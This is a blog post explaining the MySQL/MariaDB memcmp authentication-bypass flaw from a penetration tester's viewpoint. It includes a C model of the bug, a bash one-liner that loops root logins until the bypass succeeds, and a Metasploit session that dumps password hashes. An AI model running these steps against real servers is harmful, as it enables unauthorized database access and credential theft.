The news about the vulnerability in MySQL and MariaDB is spreading like
wildfire. I have already covered this vulnerability in E Hacking News as a
news article. Here, I am going to share the same thing from the
perspective of a penetration tester.
The MySQL and MariaDB versions 5.1.61, 5.2.11, 5.3.5 and 5.5.22 are the affected versions.
The vulnerability allows an attacker to access a MySQL database without
supplying the proper authentication credentials. It can only be
exploited if MySQL was built on a system where the memcmp() function can
return values outside the -128 to 127 range: the server stores the result of
comparing the password scramble in a char-sized my_bool, so a value such as
256 is truncated to 0, which the server reads as a successful match.
According to Golubchik, the gcc built-in memcmp and the BSD libc memcmp are safe, but the Linux glibc SSE-optimised memcmp is not.
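To make the memcmp() point concrete, here is an added example (not from this post, and not MySQL's or glibc's own source) that models the two shapes of the server's scramble check. The comparator wide_memcmp, the SHA1_HASH_SIZE constant, the function names and the all-zero expected hash are all constructed for illustration; the example relies only on two facts: the C standard fixes just the sign of memcmp's return value, and MySQL returned the comparison through a char-sized my_bool.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define SHA1_HASH_SIZE 20

/* MySQL's my_bool was historically a plain char; the comparison result is
 * narrowed through it, which is the whole problem. */
typedef char my_bool;

/* Constructed stand-in for a memcmp that returns the difference of the first
 * mismatching 16-bit little-endian word instead of the first mismatching
 * byte. The C standard only fixes the sign of memcmp's result, so this is a
 * conforming memcmp; it models the wide results the post attributes to
 * glibc's SSE-optimised version without being that code. */
static int wide_memcmp(const void *a, const void *b, size_t n)
{
    const unsigned char *pa = a, *pb = b;
    size_t i;
    for (i = 0; i + 2 <= n; i += 2) {
        int wa = pa[i] | (pa[i + 1] << 8);
        int wb = pb[i] | (pb[i + 1] << 8);
        if (wa != wb)
            return wa - wb;          /* anywhere in -65535..65535 */
    }
    for (; i < n; i++)
        if (pa[i] != pb[i])
            return pa[i] - pb[i];
    return 0;
}

/* Vulnerable shape: the int result is returned through a char-sized my_bool.
 * On gcc/clang the conversion is reduction modulo 256, so -256, 512, ... all
 * become 0, which the caller reads as "scramble matched". */
static my_bool check_scramble_vulnerable(const unsigned char *expected,
                                         const unsigned char *supplied)
{
    return wide_memcmp(expected, supplied, SHA1_HASH_SIZE);
}

/* Fixed shape: collapse to 0/1 before narrowing, so only a true match is 0. */
static my_bool check_scramble_fixed(const unsigned char *expected,
                                    const unsigned char *supplied)
{
    return wide_memcmp(expected, supplied, SHA1_HASH_SIZE) != 0;
}

/* The caller's convention: 0 from check_scramble means the login succeeds. */
static bool login_accepted(const unsigned char *expected,
                           const unsigned char *supplied, bool fixed)
{
    my_bool r = fixed ? check_scramble_fixed(expected, supplied)
                      : check_scramble_vulnerable(expected, supplied);
    return r == 0;
}

/* Count how many of the 255 single-byte corruptions of a constructed,
 * all-zero expected hash at byte `pos` are wrongly accepted. A byte-exact
 * comparison would accept none of them. */
int count_false_accepts(size_t pos, bool fixed)
{
    unsigned char expected[SHA1_HASH_SIZE] = {0};
    unsigned char supplied[SHA1_HASH_SIZE];
    int accepted = 0;
    for (int v = 1; v < 256; v++) {
        memcpy(supplied, expected, SHA1_HASH_SIZE);
        supplied[pos] = (unsigned char)v;
        if (login_accepted(expected, supplied, fixed))
            accepted++;
    }
    return accepted;
}

int main(void)
{
    printf("byte 1 differs, vulnerable: %d/255 accepted\n",
           count_false_accepts(1, false));
    printf("byte 1 differs, fixed:      %d/255 accepted\n",
           count_false_accepts(1, true));
    printf("byte 0 differs, vulnerable: %d/255 accepted\n",
           count_false_accepts(0, false));
    return 0;
}
```

Compile it with cc -std=c99 -Wall and run it: the vulnerable path accepts all 255 corruptions of byte 1, because every difference there is a multiple of 256 and vanishes in the char conversion, while differences in byte 0 and the fixed path accept none. That position dependence is why a wrong password only sometimes gets through, and why the post's test loop and the Metasploit module need many attempts rather than one.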
Not all Linux distros are affected; only the following systems are vulnerable:
* Ubuntu Linux 64-bit (10.04, 11.10, 11.04, 12.04)
* openSUSE 12.1 64-bit, MySQL 5.5.23-log
* Debian Unstable 64-bit, 5.5.23.2
* Fedora
* Arch Linux
In order to test for the vulnerability, run the following bash one-liner:
for i in $(seq 1 1000); do mysql -u root --password=bad -h 127.0.0.1 2>/dev/null; done
On an affected MySQL server, the loop above will eventually obtain access as the root user account.
The following video was provided by one of the EHN readers:
Exploiting using Metasploit:
One of the Metasploit contributors committed a threaded brute-force module that abuses the authentication bypass flaw to automatically dump the password database.
A quick demonstration of this module is shown below, using the latest Metasploit Framework Git/SVN snapshot:
$ msfconsole
msf > use auxiliary/scanner/mysql/mysql_authbypass_hashdump
msf auxiliary(mysql_authbypass_hashdump) > set USERNAME root
msf auxiliary(mysql_authbypass_hashdump) > set RHOSTS 127.0.0.1
msf auxiliary(mysql_authbypass_hashdump) > run
[+] 127.0.0.1:3306 The server allows logins, proceeding with bypass test
[*] 127.0.0.1:3306 Authentication bypass is 10% complete
[*] 127.0.0.1:3306 Authentication bypass is 20% complete
[*] 127.0.0.1:3306 Successfully bypassed authentication after 205 attempts
[+] 127.0.0.1:3306 Successful exploited the authentication bypass flaw, dumping hashes...
[+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D
[+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D
[+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D
[+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D
[+] 127.0.0.1:3306 Saving HashString as Loot: debian-sys-maint:*C59FFB311C358B4EFD4F0B82D9A03CBD77DC7C89
[*] 127.0.0.1:3306 Hash Table has been saved: 20120611013537_default_127.0.0.1_mysql.hashes_889573.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Please comment if I have done well, or if you have learned something from the blog.